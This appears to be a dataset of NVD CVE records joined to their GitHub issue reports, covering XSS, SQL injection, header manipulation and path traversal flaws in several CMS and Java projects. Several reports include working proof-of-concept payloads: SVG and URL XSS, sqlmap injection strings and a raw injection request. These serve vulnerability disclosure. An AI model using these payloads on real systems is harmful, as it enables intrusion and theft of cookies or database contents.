With new versions of Polkit, the value `auth_self_keep_session` is no more valid for the tags `<allow_any>`, `<allow_inactive>` and `<allow_active>`. The [usbguard policy config](https://github.com/USBGuard/usbguard/blob/master/src/DBus/org.usbguard1.policy) is not parsed anymore by new versions of Polkit, and the defined actions are unavailable. #### proposed solutions * `auth_self_keep_session`: allowed executing an action after authenticating, and the redo the action without auth for all the rest of the session. It is now unavailable * `auth_self_keep`: the authorization is kept for a brief period (e.g. five minutes). It is most probably not retro-compatible. (I found no reference online of `auth_self_keep` on pages mentioning `auth_self_keep_session`) * `auth_self`: You have to re-authenticate at each call of the action. This argument is retro-compatible. Should we replace occurrences of `auth_self_keep_session` with `auth_self_keep` or `auth_self`?
Polkit policy is not valid with newest versions of Polkit
https://api.github.com/repos/USBGuard/usbguard/issues/403/comments
1
2020-08-07T17:54:42Z
2022-02-14T09:54:59Z
https://github.com/USBGuard/usbguard/issues/403
675,176,585
403
3,225
CVE-2021-43724
2022-02-24T15:15:23.950
A Cross Site Scripting (XSS) vulnerability exits in Subrion CMS through 4.2.1 in the Create Page functionality of the admin Account via a SGV file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1.7, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/intelliants/subrion/issues/890" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/intelliants/subrion/issues/890" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:intelliants:subrion_cms:*:*:*:*:*:*:*:*", "matchCriteriaId": "970BC2B7-56FC-43DA-92C7-083A0423D1EF", "versionEndExcluding": null, "versionEndIncluding": "4.2.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/intelliants/subrion/issues/890
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "intelliants", "subrion" ]
I have found Cross Site Scripting (XSS) bug in subrion CMS version 4.2.1 in the Create Page functionality of the admin Account. Steps to Reproduce: just login as admin and clink this url https://demos.subrion.org/?demo=core&admin=1 As an admin Create test page In the Add a Page section go to the Page Content then clink “image” choose local file 123.svg to upload in url :https://demos.subrion.org/_core/admin/elfinder/?mode=image&CKEditor=contents%5Ben%5D&CKEditorFuncNum=1&langCode=en#elf_l1_Lw the content of 123.svg: <?xml version="1.0" encoding="UTF-8" standalone="yes"?> ``` <svg onload="alert('xss attach')" xmlns="http://www.w3.org/2000/svg"> </svg> ``` ![image](https://user-images.githubusercontent.com/57324002/140773739-c0e57310-0fbb-4c15-8997-6f539ee164d5.png) copy the url of 123.svg then and a link to page content: ![image](https://user-images.githubusercontent.com/57324002/141151201-4da4774c-dd64-4297-ad2d-a0ec1e2dc3a1.png) save the new page and open new page:http://localhost/123.html ![image](https://user-images.githubusercontent.com/57324002/141151398-01538599-9461-409a-ab90-f936173601d1.png) Xss prompt box will pop up ![image](https://user-images.githubusercontent.com/57324002/141151473-b5782faa-a6cb-430b-a49d-35d98888c85c.png) Impact: Session cookies can be stolen , user can be redirected to phishing pages , browser of the user visiting this page can be controlled etc. POC's have been uploaded. ![image](https://user-images.githubusercontent.com/57324002/140775407-6c18a98c-0752-4e28-809b-2fc6a1f08eff.png)
this is Cross Site Scripting (XSS)
https://api.github.com/repos/intelliants/subrion/issues/890/comments
2
2021-11-08T16:01:45Z
2022-07-20T08:19:51Z
https://github.com/intelliants/subrion/issues/890
1,047,624,132
890
3,226
CVE-2021-44550
2022-02-24T15:15:24.067
An Incorrect Access Control vulnerability exists in CoreNLP 4.3.2 via the classifier in NERServlet.java (lines 158 and 159).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/stanfordnlp/CoreNLP/issues/1222" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/stanfordnlp/CoreNLP/issues/1222" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:stanford:corenlp:4.3.2:*:*:*:*:*:*:*", "matchCriteriaId": "B657A9FE-04C1-40B0-99A0-ED6CF72BA13B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "74" ]
74
https://github.com/stanfordnlp/CoreNLP/issues/1222
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "stanfordnlp", "CoreNLP" ]
https://github.com/stanfordnlp/CoreNLP/blob/d147ba597bb13efeab5c567d677854bfc69104e6/src/edu/stanford/nlp/ie/ner/webapp/NERServlet.java#L152-L159 We found 'classifier' may be contaminated on line 152 of NERServlet.java.java.Including unvalidated data in an HTTP response header can enable cache-poisoning, cross-site scripting, cross-user defacement, page hijacking, cookie manipulation or open redirect..It will affect on line 157 of NERServlet.java.Lines 158 and 159 have similar problems.
Header Manipulation
https://api.github.com/repos/stanfordnlp/CoreNLP/issues/1222/comments
0
2021-11-26T09:00:27Z
2022-02-24T06:17:09Z
https://github.com/stanfordnlp/CoreNLP/issues/1222
1,064,237,894
1,222
3,227
CVE-2021-44607
2022-02-24T15:15:24.237
A Cross Site Scripting (XSS) vulnerability exists in FUEL-CMS 1.5.1 in the Assets page via an SVG file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/daylightstudio/FUEL-CMS/issues/589" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/daylightstudio/FUEL-CMS/issues/589" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "F3A806A2-582F-49B6-B9EC-C0FB4B13ED3D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/daylightstudio/FUEL-CMS/issues/589
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "daylightstudio", "FUEL-CMS" ]
A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS-1.5.1 that allows an authenticated user authorized to upload a malicious .svg file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack 1. login as admin .in the Assets page ![image](https://user-images.githubusercontent.com/57324002/143893166-5679189f-2e92-43a1-ac13-4f3c5de83534.png) 2. upload the malicious svg. the content of xss-cookie.svg : ``` <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400 "/> <script type="text/javascript"> alert(document.domain); </script> </svg> ``` ![image](https://user-images.githubusercontent.com/57324002/143893272-ec05eb16-b0a4-4826-9599-e22909b2d194.png) 3. back to Assets then wo can see xss-cookie.svg have been upload: ![image](https://user-images.githubusercontent.com/57324002/143893849-a72a009e-afe8-49b8-80da-2685c88e8c9f.png) 4. when user click the xss-cookie.svg it will trigger a XSS attack ![image](https://user-images.githubusercontent.com/57324002/143893939-e680c062-7dd8-4cd8-9347-3e4355352810.png)
A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS-1.5.1
https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/589/comments
0
2021-11-29T15:19:12Z
2021-11-29T15:19:12Z
https://github.com/daylightstudio/FUEL-CMS/issues/589
1,066,165,915
589
3,228
CVE-2021-44608
2022-02-24T15:15:24.277
Multiple Cross Site Scripting (XSS) vulnerabilities exists in bloofoxCMS 0.5.2.1 - 0.5.1 via the (1) file parameter and (2) type parameter in an edit action in index.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/alexlang24/bloofoxCMS/issues/12" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/alexlang24/bloofoxCMS/issues/12" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bloofox:bloofoxcms:*:*:*:*:*:*:*:*", "matchCriteriaId": "DA028444-D83F-453D-99B1-FDE5B6C71C51", "versionEndExcluding": null, "versionEndIncluding": "0.5.2.1", "versionStartExcluding": null, "versionStartIncluding": "0.5.1", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/alexlang24/bloofoxCMS/issues/12
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "alexlang24", "bloofoxCMS" ]
I found two Authenticated Cross-Site Scripting in 'file' parameter and 'type' parameter ### Cross-Site Scripting in the parameter 'file' ``` http://localhost/bloofoxcms/admin/index.php?mode=content&page=media&action=edit&file=info.svg%27%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E&type=0 ``` ![image](https://user-images.githubusercontent.com/57324002/144261144-e5330153-f46b-4d80-ad14-3cd4037ab300.png) ### Cross-Site Scripting in the parameter 'type' ``` http://localhost/bloofoxcms/admin/index.php?mode=content&page=media&action=edit&file=info.svg&type=%27%3E%3CScRiPt%3Ealert(document.cookie)%3C/ScRiPt%3E ``` ![image](https://user-images.githubusercontent.com/57324002/144261379-46a1134b-796e-467c-bd38-a3114a716aae.png) ### Impact The attacker can execute a HTML/JS Code the attacker can stealing cookies
'Multiple' Cross-Site Scripting (XSS) (Authenticated)
https://api.github.com/repos/alexlang24/bloofoxCMS/issues/12/comments
0
2021-12-01T15:46:38Z
2021-12-01T15:46:38Z
https://github.com/alexlang24/bloofoxCMS/issues/12
1,068,569,062
12
3,229
CVE-2021-44610
2022-02-24T15:15:24.317
Multiple SQL Injection vulnerabilities exist in bloofoxCMS 0.5.2.1 - 0.5.1 via the (1) URLs, (2) lang_id, (3) tmpl_id, (4) mod_rewrite (5) eta_doctype. (6) meta_charset, (7) default_group, and (8) page group parameters in the settings mode in admin/index.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/alexlang24/bloofoxCMS/issues/13" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/alexlang24/bloofoxCMS/issues/13" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bloofox:bloofoxcms:*:*:*:*:*:*:*:*", "matchCriteriaId": "DA028444-D83F-453D-99B1-FDE5B6C71C51", "versionEndExcluding": null, "versionEndIncluding": "0.5.2.1", "versionStartExcluding": null, "versionStartIncluding": "0.5.1", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/alexlang24/bloofoxCMS/issues/13
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "alexlang24", "bloofoxCMS" ]
bloofoxCMS-0.5.2.1 have no security filtering of user input parameters in the admin center page. resulting in a large number of sql injection vulnerabilities - http://localhost/admin/index.php?mode=settings&page=projects&action=new We can use sqlmap to validate: ``` in the parameters: eta_doctype. tmpl_id. urls.lang_id.meta_charset.mod_rewrite.default_group.meta_charset.page.default_group sqlmap identified the following injection point(s) with a total of 40629 HTTP(s) requests: --- Parameter: tmpl_id (POST) Type: boolean-based blind Payload: name=123&lang_id=1&tmpl_id=1' RLIKE (SELECT (CASE WHEN (1317=1317) THEN 1 ELSE 0x28 END)) AND 'IGBu'='IGBu&urls=123123123&meta_title=123123&mod_rewrite=1&mail=123123@123.com&meta_copyright=13123&meta_desc=123123&meta_keywords=123123&meta_author=123123&meta_charset=#set($c=828095359+864788981)$&meta_doctype=XHTML 1.0 Transitional&default_group=1&send=Add Project Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: name=123&lang_id=1&tmpl_id=1' AND (SELECT 6808 FROM(SELECT COUNT(*),CONCAT(0x716b717871,(SELECT (ELT(6808=6808,1))),0x71716b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'jPpX'='jPpX&urls=123123123&meta_title=123123&mod_rewrite=1&mail=123123@123.com&meta_copyright=13123&meta_desc=123123&meta_keywords=123123&meta_author=123123&meta_charset=#set($c=828095359+864788981)$&meta_doctype=XHTML 1.0 Transitional&default_group=1&send=Add Project Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Parameter: mod_rewrite (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: name=123&lang_id=1&tmpl_id=1&urls=123123123&meta_title=123123&mod_rewrite=1' RLIKE (SELECT (CASE WHEN (3856=3856) THEN 1 ELSE 0x28 END)) AND 'dTgD'='dTgD&mail=123123@123.com&meta_copyright=13123&meta_desc=123123&meta_keywords=123123&meta_author=123123&meta_charset=#set($c=828095359+864788981)$&meta_doctype=XHTML 1.0 Transitional&default_group=1&send=Add Project Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: name=123&lang_id=1' AND (SELECT 5000 FROM(SELECT COUNT(*),CONCAT(0x716b717871,(SELECT (ELT(5000=5000,1))),0x71716b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ebBO'='ebBO&tmpl_id=1&urls=123123123&meta_title=123123&mod_rewrite=1&mail=123123@123.com&meta_copyright=13123&meta_desc=123123&meta_keywords=123123&meta_author=123123&meta_charset=#set($c=828095359+864788981)$&meta_doctype=XHTML 1.0 Transitional&default_group=1&send=Add Project Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: name=123&lang_id=1' AND (SELECT 5725 FROM (SELECT(SLEEP(5)))XuAL) AND 'WPHl'='WPHl&tmpl_id=1&urls=123123123&meta_title=123123&mod_rewrite=1&mail=123123@123.com&meta_copyright=13123&meta_desc=123123&meta_keywords=123123&meta_author=123123&meta_charset=#set($c=828095359+864788981)$&meta_doctype=XHTML 1.0 Transitional&default_group=1&send=Add Project Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) Parameter: urls (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: name=123&lang_id=1&tmpl_id=1&urls=123123123' RLIKE (SELECT (CASE WHEN (7865=7865) THEN 123123123 ELSE 0x28 END)) AND 'xTce'='xTce&meta_title=123123&mod_rewrite=1&mail=123123@123.com&meta_copyright=13123&meta_desc=123123&meta_keywords=123123&meta_author=123123&meta_charset=#set($c=828095359+864788981)$&meta_doctype=XHTML 1.0 Transitional&default_group=1&send=Add Project Vector: RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END)) ``` ![image-20211202140353561-16384250933251](https://user-images.githubusercontent.com/57324002/144426642-99988119-85bf-4a0d-aeee-918799047fc6.png) - http://www.bloofoxcms.com/admin/index.php?mode=settings ``` in the parameters: u1=1&u6=&u2=1&u7=1&u4=0&u30=&u40=1&u8=1&u10=500&u12=250&u3=1&u5=0&u9=0&u20=0&sid=40&send=Save such as u30: POST /admin/index.php?mode=settings HTTP/1.1 Host: www.bloofoxcms.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 183 Origin: http://www.bloofoxcms.com Connection: close Referer: http://www.bloofoxcms.com/admin/index.php?mode=settings Cookie: sid=9vgga5phvis1novmp7avetjct4 Upgrade-Insecure-Requests: 1 u1=0&u6=&u2=0&u7=0&u4=0&u30=http%3A%2F%2Flocalhost%2Fphpmyadmin'+and+updatexml(1,concat(0x7e,(select+user()),0x7e),1)#&u40=0&u8=0&u10=500&u12=250&u3=0&u5=0&u9=0&u20=0&sid=40&send=Save ``` ![image-20211202142443517](https://user-images.githubusercontent.com/57324002/144426867-7ff32f8a-4e63-481f-b487-b3233ad86020.png)
Multiple SQL injection vulnerabilities
https://api.github.com/repos/alexlang24/bloofoxCMS/issues/13/comments
0
2021-12-02T13:03:52Z
2021-12-02T13:03:52Z
https://github.com/alexlang24/bloofoxCMS/issues/13
1,069,525,390
13
3,230
CVE-2021-45746
2022-02-24T15:15:24.770
A Directory Traversal vulnerability exists in WeBankPartners wecube-platform 3.2.1 via the file variable in PluginPackageController.java.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/WeBankPartners/wecube-platform/issues/2297" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/WeBankPartners/wecube-platform/issues/2297" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webank:wecube:3.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "7A0D0496-F0EB-4054-B5C8-C3F5CBA50E7E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/WeBankPartners/wecube-platform/issues/2297
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "WeBankPartners", "wecube-platform" ]
https://github.com/WeBankPartners/wecube-platform/blob/15b004e0295c9466ac11c717bee27165fc5b13a9/platform-core/src/main/java/com/webank/wecube/platform/core/controller/plugin/PluginPackageController.java#L76-L84 https://github.com/WeBankPartners/wecube-platform/blob/15b004e0295c9466ac11c717bee27165fc5b13a9/platform-core/src/main/java/com/webank/wecube/platform/core/service/plugin/PluginArtifactsMgmtService.java#L361-L380 https://github.com/WeBankPartners/wecube-platform/blob/15b004e0295c9466ac11c717bee27165fc5b13a9/platform-core/src/main/java/com/webank/wecube/platform/core/service/plugin/PluginArtifactsMgmtService.java#L476-L488 We found 'file' may be contaminated on line 77 of PluginPackageController.java.Use of unfiltered data in selection of requested application file path could lead to sensitive data disclosure and potential theft of proprietary business logic.It will affect on line 487 of PluginArtifactsMgmtService.java
Path Manipulation
https://api.github.com/repos/WeBankPartners/wecube-platform/issues/2297/comments
1
2021-11-23T08:43:10Z
2021-12-02T06:55:04Z
https://github.com/WeBankPartners/wecube-platform/issues/2297
1,060,968,991
2,297
3,231
CVE-2022-24599
2022-02-24T15:15:29.633
In autofile Audio File Library 0.3.6, there exists one memory leak vulnerability in printfileinfo, in printinfo.c, which allows an attacker to leak sensitive information via a crafted file. The printfileinfo function calls the copyrightstring function to get data, however, it dosn't use zero bytes to truncate the data.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mpruett/audiofile/issues/60" }, { "source": "cve@mitre.org", "tags": [ "Mailing List" ], "url": "https://lists.debian.org/debian-lts-announce/2023/11/msg00006.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/N4JXZ6QAMA3TSRY6GUZRY3WTHR7P5TPH/" }, { "source": "cve@mitre.org", "tags": [ "Mailing List" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WTETOUJNRR75REYJZTBGF6TAJZYTMXUY/" }, { "source": "cve@mitre.org", "tags": [ "Mailing List" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YZPG27YKICLIWUFOPVUOAFAZGOX4BNHY/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/mpruett/audiofile/issues/60" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List" ], "url": "https://lists.debian.org/debian-lts-announce/2023/11/msg00006.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/N4JXZ6QAMA3TSRY6GUZRY3WTHR7P5TPH/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List" ], "url": 